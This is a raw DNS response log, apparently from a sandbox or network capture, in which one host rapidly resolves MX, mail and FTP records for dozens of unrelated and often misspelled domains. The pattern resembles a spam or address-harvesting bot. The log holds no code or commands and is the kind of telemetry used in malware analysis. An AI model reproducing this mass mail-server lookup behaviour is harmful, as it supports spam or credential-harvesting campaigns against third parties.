Feb 21, 2024 00:26:05.523505926 CET	1.1.1.1	192.168.2.6	0xae24	Name error (3)	jalds.org	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741930962 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741930962 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741930962 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741930962 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741930962 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741930962 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741964102 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741964102 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741964102 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741964102 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741964102 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.741964102 CET	1.1.1.1	192.168.2.6	0x55b8	No error (0)	houseguru.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:06.180541039 CET	1.1.1.1	192.168.2.6	0xd21a	No error (0)	mail.breecetechnology.co.za		78.47.2.70	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:06.180557013 CET	1.1.1.1	192.168.2.6	0xd21a	No error (0)	mail.breecetechnology.co.za		78.47.2.70	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:06.780272007 CET	1.1.1.1	192.168.2.6	0x6a4a	Server failure (2)	att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:06.780332088 CET	1.1.1.1	192.168.2.6	0x6a4a	Server failure (2)	att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:06.780348063 CET	1.1.1.1	192.168.2.6	0x6a4a	Server failure (2)	att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.11.7	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.41.0	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.40.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.8.44	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.10.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.151499987 CET	1.1.1.1	192.168.2.6	0x6892	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.42.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.42.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.9.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.41.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.8.32	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.211021900 CET	1.1.1.1	192.168.2.6	0x68db	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.10.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.634974003 CET	1.1.1.1	192.168.2.6	0x69d	No error (0)	mx01.hrs-ds.com		213.254.36.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.826977015 CET	1.1.1.1	192.168.2.6	0xcbbd	Name error (3)	gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.831326962 CET	1.1.1.1	192.168.2.6	0x2a02	Name error (3)	hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.834912062 CET	1.1.1.1	192.168.2.6	0x8db5	Name error (3)	undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.837156057 CET	1.1.1.1	192.168.2.6	0x1aa8	Name error (3)	ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.865906000 CET	1.1.1.1	192.168.2.6	0xf23f	Name error (3)	jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.874388933 CET	1.1.1.1	192.168.2.6	0x3d60	Name error (3)	radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.912985086 CET	1.1.1.1	192.168.2.6	0x8762	Name error (3)	generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.916389942 CET	1.1.1.1	192.168.2.6	0x49f8	Name error (3)	hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.918064117 CET	1.1.1.1	192.168.2.6	0x6b4b	Name error (3)	heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.939383030 CET	1.1.1.1	192.168.2.6	0xa1b4	Name error (3)	hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.966829062 CET	1.1.1.1	192.168.2.6	0xdc0	Name error (3)	dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.035254955 CET	1.1.1.1	192.168.2.6	0x7a8e	Name error (3)	sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.076148987 CET	1.1.1.1	192.168.2.6	0x469d	No error (0)	www.caspianseagulltravels.com		31.193.11.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.118231058 CET	1.1.1.1	192.168.2.6	0xea6b	No error (0)	alt3.aspmx.l.google.com		142.250.27.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.124308109 CET	1.1.1.1	192.168.2.6	0xa52a	No error (0)	mx3-hosting.jellyfish.systems		162.255.118.13	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.164855003 CET	1.1.1.1	192.168.2.6	0xc79e	No error (0)	www.stylesense.co.uk		86.105.245.69	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.174561024 CET	1.1.1.1	192.168.2.6	0xa52c	No error (0)	www.glazing-bt.com		45.147.96.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.178198099 CET	1.1.1.1	192.168.2.6	0x2e99	Name error (3)	igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.211333990 CET	1.1.1.1	192.168.2.6	0x7498	No error (0)	eskimo1.cleanmail.ch		91.208.173.98	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.227834940 CET	1.1.1.1	192.168.2.6	0x96ae	No error (0)	www.domainmarkt.de		46.4.13.92	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.301004887 CET	1.1.1.1	192.168.2.6	0x4894	No error (0)	mx1.pub.mailpod8-cph3.one.com		185.164.14.102	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.316016912 CET	1.1.1.1	192.168.2.6	0x77fa	Name error (3)	morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.510672092 CET	1.1.1.1	192.168.2.6	0x7d83	Name error (3)	lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.513781071 CET	1.1.1.1	192.168.2.6	0xa8f0	Name error (3)	imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.545183897 CET	1.1.1.1	192.168.2.6	0x5db2	Name error (3)	smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.545511961 CET	1.1.1.1	192.168.2.6	0xbdb6	Name error (3)	x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.562192917 CET	1.1.1.1	192.168.2.6	0x5342	No error (0)	www.montessorihawaii.org	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:08.562192917 CET	1.1.1.1	192.168.2.6	0x5342	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:08.562192917 CET	1.1.1.1	192.168.2.6	0x5342	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.586935043 CET	1.1.1.1	192.168.2.6	0xd626	Name error (3)	hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.603878975 CET	1.1.1.1	192.168.2.6	0x420d	Name error (3)	jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.634865999 CET	1.1.1.1	192.168.2.6	0x1f82	Name error (3)	tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.634994984 CET	1.1.1.1	192.168.2.6	0x280c	Name error (3)	hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.636250973 CET	1.1.1.1	192.168.2.6	0x5d35	No error (0)	protonmail.com		185.70.42.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.637075901 CET	1.1.1.1	192.168.2.6	0x5e04	Name error (3)	hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.643840075 CET	1.1.1.1	192.168.2.6	0x9fb7	Name error (3)	oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.648567915 CET	1.1.1.1	192.168.2.6	0x8cbb	No error (0)	www.markoren.no		185.39.146.199	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.666851044 CET	1.1.1.1	192.168.2.6	0x799d	No error (0)	www.eyegage.com	proxy-ssl.webflow.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:08.666851044 CET	1.1.1.1	192.168.2.6	0x799d	No error (0)	proxy-ssl.webflow.com	proxy-ssl-geo.webflow.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:08.666851044 CET	1.1.1.1	192.168.2.6	0x799d	No error (0)	proxy-ssl-geo.webflow.com		34.234.52.18	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.666851044 CET	1.1.1.1	192.168.2.6	0x799d	No error (0)	proxy-ssl-geo.webflow.com		52.206.163.162	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.666851044 CET	1.1.1.1	192.168.2.6	0x799d	No error (0)	proxy-ssl-geo.webflow.com		3.233.126.24	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.670718908 CET	1.1.1.1	192.168.2.6	0x3aca	Name error (3)	utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.672162056 CET	1.1.1.1	192.168.2.6	0xbd4d	Name error (3)	rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.679538012 CET	1.1.1.1	192.168.2.6	0xd458	Name error (3)	newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.680218935 CET	1.1.1.1	192.168.2.6	0x1345	Name error (3)	homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.681466103 CET	1.1.1.1	192.168.2.6	0x2aa9	Name error (3)	terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.684989929 CET	1.1.1.1	192.168.2.6	0x3a42	Name error (3)	zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.692289114 CET	1.1.1.1	192.168.2.6	0x9f1f	Name error (3)	farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.710381985 CET	1.1.1.1	192.168.2.6	0x4728	Name error (3)	kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.713551044 CET	1.1.1.1	192.168.2.6	0xe812	No error (0)	cfgteam-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.713551044 CET	1.1.1.1	192.168.2.6	0xe812	No error (0)	cfgteam-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.749062061 CET	1.1.1.1	192.168.2.6	0x19f1	Name error (3)	hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.755614996 CET	1.1.1.1	192.168.2.6	0x60a6	No error (0)	ww2.affinity.net		34.160.232.116	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.757239103 CET	1.1.1.1	192.168.2.6	0x8fc6	Name error (3)	spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.757814884 CET	1.1.1.1	192.168.2.6	0xd4ef	Name error (3)	scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.842418909 CET	1.1.1.1	192.168.2.6	0x8180	Name error (3)	hoenighotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.877509117 CET	1.1.1.1	192.168.2.6	0x92dc	Name error (3)	schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.905376911 CET	1.1.1.1	192.168.2.6	0x93e1	Server failure (2)	att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.913944960 CET	1.1.1.1	192.168.2.6	0x831c	Name error (3)	esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.930584908 CET	1.1.1.1	192.168.2.6	0xdb5d	Name error (3)	fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.222886086 CET	1.1.1.1	192.168.2.6	0x9c3d	Name error (3)	ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.232533932 CET	1.1.1.1	192.168.2.6	0x6500	Name error (3)	hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.238255978 CET	1.1.1.1	192.168.2.6	0x8366	Name error (3)	runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.324480057 CET	1.1.1.1	192.168.2.6	0x7d83	No error (0)	www.corp.att.com	www.corp.att.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:09.354939938 CET	1.1.1.1	192.168.2.6	0x9f18	Name error (3)	gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.376576900 CET	1.1.1.1	192.168.2.6	0x387a	No error (0)	www.mwpmedia.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:09.376576900 CET	1.1.1.1	192.168.2.6	0x387a	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.376576900 CET	1.1.1.1	192.168.2.6	0x387a	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.376576900 CET	1.1.1.1	192.168.2.6	0x387a	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.376576900 CET	1.1.1.1	192.168.2.6	0x387a	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.470329046 CET	1.1.1.1	192.168.2.6	0xa3b0	No error (0)	mx00.ionos.co.uk		212.227.15.41	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.474397898 CET	1.1.1.1	192.168.2.6	0xadc	Name error (3)	relay.hoenighotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.489537954 CET	1.1.1.1	192.168.2.6	0x22fd	No error (0)	www.gmcocorp.com	www22.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:09.489537954 CET	1.1.1.1	192.168.2.6	0x22fd	No error (0)	www22.wixdns.net	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:09.489537954 CET	1.1.1.1	192.168.2.6	0x22fd	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:09.489537954 CET	1.1.1.1	192.168.2.6	0x22fd	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.568564892 CET	1.1.1.1	192.168.2.6	0x52a2	No error (0)	iisalessandrini.edu.it		15.161.71.77	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.681102991 CET	1.1.1.1	192.168.2.6	0x37a3	No error (0)	imp.ovh.net	ns0.ovh.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:09.681102991 CET	1.1.1.1	192.168.2.6	0x37a3	No error (0)	ns0.ovh.net		193.70.18.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.682874918 CET	1.1.1.1	192.168.2.6	0x1eae	No error (0)	www.netzschnipsel.de		217.160.122.119	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.686393023 CET	1.1.1.1	192.168.2.6	0x1e0e	Name error (3)	ftp.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.707345009 CET	1.1.1.1	192.168.2.6	0xac88	Name error (3)	ftp.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.707645893 CET	1.1.1.1	192.168.2.6	0x8636	Name error (3)	ftp.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.724302053 CET	1.1.1.1	192.168.2.6	0xba51	Name error (3)	ftp.aregods.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.747162104 CET	1.1.1.1	192.168.2.6	0x9825	Name error (3)	ftp.sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.754740000 CET	1.1.1.1	192.168.2.6	0xabcd	Name error (3)	ftp.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.768260956 CET	1.1.1.1	192.168.2.6	0x9ad4	Name error (3)	mail.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.780565977 CET	1.1.1.1	192.168.2.6	0x1944	Name error (3)	ftp.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.791744947 CET	1.1.1.1	192.168.2.6	0x7b89	Name error (3)	ftp.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.799679995 CET	1.1.1.1	192.168.2.6	0x42c	Name error (3)	ftp.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.815201998 CET	1.1.1.1	192.168.2.6	0x8770	Server failure (2)	ftp.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.829874039 CET	1.1.1.1	192.168.2.6	0xa6e2	No error (0)	www.cabinet-orsika.fr		51.159.190.167	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.860394001 CET	1.1.1.1	192.168.2.6	0xe509	Name error (3)	mail.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.873387098 CET	1.1.1.1	192.168.2.6	0x2a9a	Name error (3)	ftp.temxp.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.918190956 CET	1.1.1.1	192.168.2.6	0x84fe	Name error (3)	mail.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.939064026 CET	1.1.1.1	192.168.2.6	0xfcb	Name error (3)	ftp.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.939660072 CET	1.1.1.1	192.168.2.6	0x212e	Name error (3)	ftp.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.942795992 CET	1.1.1.1	192.168.2.6	0x8d04	Name error (3)	ftp.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.944236040 CET	1.1.1.1	192.168.2.6	0x4136	Name error (3)	ftp.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.961246014 CET	1.1.1.1	192.168.2.6	0xdc8f	No error (0)	ftp.architettosangiorgio.ch		109.164.208.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.965917110 CET	1.1.1.1	192.168.2.6	0x1c4b	Name error (3)	mail.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.978460073 CET	1.1.1.1	192.168.2.6	0x689e	Name error (3)	ftp.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.979069948 CET	1.1.1.1	192.168.2.6	0x1e9f	Name error (3)	ftp.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.985858917 CET	1.1.1.1	192.168.2.6	0xa352	Name error (3)	mail.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.995501041 CET	1.1.1.1	192.168.2.6	0x8275	Name error (3)	ftp.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.004368067 CET	1.1.1.1	192.168.2.6	0xb418	Name error (3)	ftp.hoenighotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.007832050 CET	1.1.1.1	192.168.2.6	0xcf97	Name error (3)	ftp.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.008272886 CET	1.1.1.1	192.168.2.6	0x617	Name error (3)	ftp.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.036643982 CET	1.1.1.1	192.168.2.6	0x67bf	Name error (3)	mail.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.067639112 CET	1.1.1.1	192.168.2.6	0x1db0	Name error (3)	ftp.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.067719936 CET	1.1.1.1	192.168.2.6	0x46d0	Name error (3)	ftp.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.068057060 CET	1.1.1.1	192.168.2.6	0x4124	Name error (3)	mail.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.073029041 CET	1.1.1.1	192.168.2.6	0x876c	Name error (3)	ftp.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.079838991 CET	1.1.1.1	192.168.2.6	0x47c4	Name error (3)	ftp.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.088519096 CET	1.1.1.1	192.168.2.6	0xc708	Name error (3)	mail.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.089660883 CET	1.1.1.1	192.168.2.6	0x50cf	Name error (3)	ftp.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.090395927 CET	1.1.1.1	192.168.2.6	0xaa1	Name error (3)	ftp.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.090425014 CET	1.1.1.1	192.168.2.6	0x2137	No error (0)	proton.me		185.70.42.45	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.109643936 CET	1.1.1.1	192.168.2.6	0xaf2b	Name error (3)	ftp.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.132081985 CET	1.1.1.1	192.168.2.6	0x6813	Name error (3)	ftp.29hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.144407034 CET	1.1.1.1	192.168.2.6	0x625d	Name error (3)	mail.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.172276974 CET	1.1.1.1	192.168.2.6	0x7f25	Name error (3)	mail.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.186661005 CET	1.1.1.1	192.168.2.6	0x3d92	Name error (3)	ftp.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.215960026 CET	1.1.1.1	192.168.2.6	0xc430	Name error (3)	mail.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.229562998 CET	1.1.1.1	192.168.2.6	0x1284	Name error (3)	mail.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.229752064 CET	1.1.1.1	192.168.2.6	0xbb67	Name error (3)	ftp.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.233952999 CET	1.1.1.1	192.168.2.6	0x1579	Name error (3)	ftp.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.237915993 CET	1.1.1.1	192.168.2.6	0x59fa	Name error (3)	mail.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.241842985 CET	1.1.1.1	192.168.2.6	0x8350	Name error (3)	ftp.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.244210958 CET	1.1.1.1	192.168.2.6	0x47a1	Name error (3)	ftp.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.244914055 CET	1.1.1.1	192.168.2.6	0xb223	Name error (3)	ftp.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.255201101 CET	1.1.1.1	192.168.2.6	0x567a	Name error (3)	ftp.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.260217905 CET	1.1.1.1	192.168.2.6	0x2e47	Name error (3)	ftp.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.263784885 CET	1.1.1.1	192.168.2.6	0xf0b9	Name error (3)	mail.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.267209053 CET	1.1.1.1	192.168.2.6	0xea09	Name error (3)	ftp.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.279944897 CET	1.1.1.1	192.168.2.6	0x4d69	Name error (3)	mail.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
